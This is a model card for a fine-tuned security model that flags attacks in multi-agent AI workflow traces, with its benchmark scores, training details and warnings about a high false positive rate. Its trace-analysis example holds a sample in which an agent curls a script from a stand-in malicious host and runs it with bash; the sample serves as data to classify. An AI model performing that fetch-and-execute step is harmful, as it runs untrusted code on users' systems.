--- license: apache-2.0 base_model: fdtn-ai/Foundation-Sec-8B-Instruct tags: - cybersecurity - agentic-ai-security - security - llm-security - owasp - qlora - fine-tuned - trace-analysis - multi-agent-security - opentelemetry model-index: - name: Foundation-Sec-8B-Agentic-V4 results: - task: type: question-answering name: Custom Cybersecurity MCQA metrics: - type: accuracy value: 74.29 name: Overall Accuracy verified: true - type: accuracy value: 70.0 name: Agentic AI Security verified: true --- # agentic-safety-gguf ![License](https://img.shields.io/badge/License-Apache%202.0-green) ![Model Size](https://img.shields.io/badge/Model-8B%20params-orange) ![Training](https://img.shields.io/badge/Training-QLoRA-purple) **Research Paper:**(https://arxiv.org/abs/2601.00848) **Specialized security model for detecting temporal attack patterns in multi-agent AI workflows.** Fine-tuned from Foundation-Sec-8B-Instruct (Llama 3.1 8B) on 80,851 curated examples + 141 targeted augmentation examples, achieving **74.29% accuracy** on custom cybersecurity benchmarksβ€”a **+31.43-point improvement** over base model (p < 0.001). ## 🎯 Key Capabilities βœ… **Temporal Attack Pattern Detection**: Identifies malicious sequences across multi-step agent workflows βœ… **OpenTelemetry Trace Analysis**: Classifies workflow traces for OWASP Top 10 Agentic vulnerabilities βœ… **Security Knowledge Q&A**: Answers technical questions about agentic AI security, LLM threats, MITRE ATT&CK βœ… **Multi-Agent Security**: Detects coordination attacks in distributed agent systems ## ⚠️ Critical Production Warning **NOT production-ready for automated security decisions:** - **False Positive Rate**: 66.7% on benign workflow traces - **Trace Accuracy**: 30% overall (60% TPR, 0% TNR) - **Root Cause**: Training data heavily skewed toward attacks (90% malicious) - **Deployment**: **Human-in-the-loop oversight mandatory** - suitable for monitoring/alerting only, not automated blocking See research paper for detailed analysis and proposed V5 improvements. ## πŸ“Š Performance Summary | Benchmark | Base Model | agentic-safety-gguf | Improvement | |-----------|------------|---------------------|-------------| | **Custom MCQA Overall** | 42.86% | **74.29%** | **+31.43 pts** | | Agentic AI Security | 40.0% | **70.0%** | +30.0 pts | | Traditional Security | 44.0% | **76.0%** | +32.0 pts | | MMLU Computer Security | - | **74.0%** | - | | MMLU Security Studies | - | **72.24%** | - | **Statistical Validation**: McNemar's χ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect) **Iterative Training**: V2 baseline (80,851 ex) β†’ V3 (+111 OWASP) β†’ V4 (+30 adversarial) demonstrated targeted augmentation effectiveness. ## πŸš€ Quick Start ```python from transformers import AutoModelForCausalLM, AutoTokenizer import torch # Load model model_name = "guerilla7/agentic-safety-gguf" tokenizer = AutoTokenizer.from_pretrained(model_name) model = AutoModelForCausalLM.from_pretrained( model_name, torch_dtype=torch.bfloat16, device_map="auto" ) # Security Q&A messages = [ {"role": "system", "content": "You are a cybersecurity expert specialized in agentic workflow security."}, {"role": "user", "content": "What is indirect prompt injection in multi-agent systems?"} ] inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(model.device) outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7, do_sample=True) response = tokenizer.decode(outputs[0], skip_special_tokens=True) print(response) ``` ### Analyzing Workflow Traces ```python import json trace = { "spans": [ {"name": "user_request", "attributes": {"action": "fetch_emails"}}, {"name": "tool_call", "attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}}, {"name": "tool_call", "attributes": {"tool": "bash", "command": "script.sh"}} ] } prompt = f"""Analyze this trace for security threats: {json.dumps(trace, indent=2)} Classify as BENIGN, SUSPICIOUS, or MALICIOUS.""" # Use model as above with prompt ``` **⚠️ Warning**: 66.7% FPR requires human review before taking action. ## πŸ“– Use Cases ### βœ… Recommended - Security research on agentic AI vulnerabilities - Educational demonstrations (OWASP Top 10) - Prototype development for security tools - Knowledge assistance (74% MCQA accuracy) ### ❌ Not Recommended - Production security monitoring without human oversight - Automated security decisions (30% trace accuracy insufficient) - Mission-critical applications - Regulatory compliance automation ## πŸŽ“ Training Details **Dataset**: 80,851 curated examples from 18 cybersecurity sources + 35,026 synthetic OpenTelemetry traces, augmented with 111 OWASP-focused + 30 adversarial examples via continuation training **Complete dataset**: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf) **Method**: QLoRA (4-bit NF4, rank 16, alpha 16) **Hardware**: NVIDIA DGX Spark (ARM64, 128GB) **Training**: V2 (1,500 steps, 6h 43m) β†’ V3 (+500 steps) β†’ V4 (+500 steps) **Loss**: 3.68 β†’ 0.52 (85.99% reduction) See research paper for the complete methodology, ablation studies, and statistical analysis. ## πŸ“š Resources - **Dataset Repository**: [datasets/guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf) - **Research Paper**: (https://arxiv.org/abs/2601.00848) - **Training Scripts**: Complete QLoRA implementation, evaluation code, GGUF quantization utilities ## πŸ“„ Citation ```bibtex @article{agentic-safety-gguf-2025, title={agentic-safety-gguf: Specialized Fine-Tuning for Agentic AI Security}, year={2025}, url={https://huggingface.co/guerilla7/agentic-safety-gguf} } ``` ## βš–οΈ Limitations 1. **High False Positive Rate (66.7%)**: Unsuitable for production without human oversight 2. **Small Evaluation Sample**: 30 trace evaluation (Β±18% confidence intervals) 3. **Synthetic Data Bias**: 43% synthetic training data 4. **ARM64-Specific**: Training validated on DGX Spark only 5. **No Commercial Comparison**: Not benchmarked against GPT-4/Claude **Proposed V5 Solution**: Balanced dataset (80K benign + 80K malicious) targeting 30-50% FPR, 75-85% TPR. See paper for detailed roadmap. ## πŸ“… Updates - **2025-12-29**: Initial release with V2/V3/V4 training artifacts and research paper ## License Apache 2.0